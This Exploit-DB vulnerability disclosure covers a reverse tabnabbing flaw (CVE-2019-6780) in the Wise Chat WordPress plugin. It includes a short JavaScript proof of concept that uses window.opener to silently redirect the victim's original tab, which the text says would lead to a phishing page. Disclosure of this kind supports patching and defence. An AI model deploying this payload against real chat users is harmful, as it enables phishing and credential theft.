Wordpress Plugin Wisechat 2.6.3 - Reverse Tabnabbing

EDB-ID:

46247


Author:

MTK

Type:

webapps


Platform:

PHP

Date:

2019-01-25


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Wordpress Plugin Wisechat <= 2.6.3 - Reverse Tabnabbing
# Date: 01-22-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://kaine.pl/
# Softwae Link: https://wordpress.org/plugins/wise-chat/
# Version: Up to V2.6.3
# Tested on: Debian 9 - Apache2 - Wordpress 4.9.8 - Firefox
# CVE : 2019-6780.


# Plugin description:
Wise Chat is a leading chat plugin that helps to build a social network and to increase user engagement on your website by providing the possibility to exchange real time messages in chat rooms. The plugin is easily installable and extremely configurable. Its features list is growing all the time.

# POC
Send following URL on wise chat "http://mtk911.cf/OR/" which has the following html

<html>
<script>
if (window.opener) window.opener.parent.location.replace('http://mtk911.cf/');
if (window.parent != window) window.parent.location.replace('http://mtk911.cf/');
</script>
Open Redirect TEST
</html>

when you click on that user. This opens in a new tab, and the parent tab is silently redirected to my website without asking the user.

#Technical Details & Impact:
In a real life example, this would redirect to a phishing site to try gain credentials for users.

# References:
https://wordpress.org/plugins/wise-chat/#developers
https://plugins.trac.wordpress.org/changeset/2016929/wise-chat/trunk/src/rendering/filters/post/WiseChatLinksPostFilter.php
https://plugins.trac.wordpress.org/changeset/2016929/wise-chat/trunk#file6
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6780